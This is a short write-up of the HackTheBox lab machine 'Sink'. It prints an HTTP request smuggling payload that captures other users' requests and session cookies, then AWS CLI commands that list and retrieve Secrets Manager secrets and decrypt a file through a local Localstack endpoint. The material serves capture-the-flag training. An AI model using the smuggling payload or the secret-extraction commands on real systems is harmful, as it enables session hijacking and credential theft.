Post

HTTP Request Smuggling & AWS - Sink @ HackTheBox

HTTP Request Smuggling & AWS - Sink @ HackTheBox

We are solving Sink, a 50-point Linux machine on HackTheBox that involves HTTP Request Smuggling & retrieving secrets from Localstack.

Notes

Reads

Example Smuggling Request

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /comment HTTP/1.1
Host: sink.htb:5000
Cookie: session=eyJlbWFpbCI6InhjdEBleGFtcGxlLmNvbSJ9.YUMdpw.xLkQCSRKf7EfIxXMMBDR8i8Pi9M
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Transfer-Encoding:chunked

0

POST /comment HTTP/1.1
Host: sink.htb:5000
Content-Type: application/x-www-form-urlencoded
Content-Length: 290
Cookie: session=eyJlbWFpbCI6InhjdEBleGFtcGxlLmNvbSJ9.YUMdpw.xLkQCSRKf7EfIxXMMBDR8i8Pi9M

msg=

AWS CLI Commands

1
2
3
4
aws --endpoint-url=http://127.0.0.1:4566 kms list-keys
aws --endpoint-url=http://127.0.0.1:4566 secretsmanager list-secrets
aws --endpoint-url=http://127.0.0.1:4566 secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-yVNfw"
aws kms decrypt --ciphertext-blob fileb:///home/david/Projects/Prod_Deployment/servers.enc --query Plaintext --output text --endpoint-url=http://127.0.0.1:4566 --key-id=804125db-bdf1-465a-a058-07fc87c0fad0 --encryption-algorithm RSAES_OAEP_SHA_256
This post is licensed under CC BY 4.0 by the author.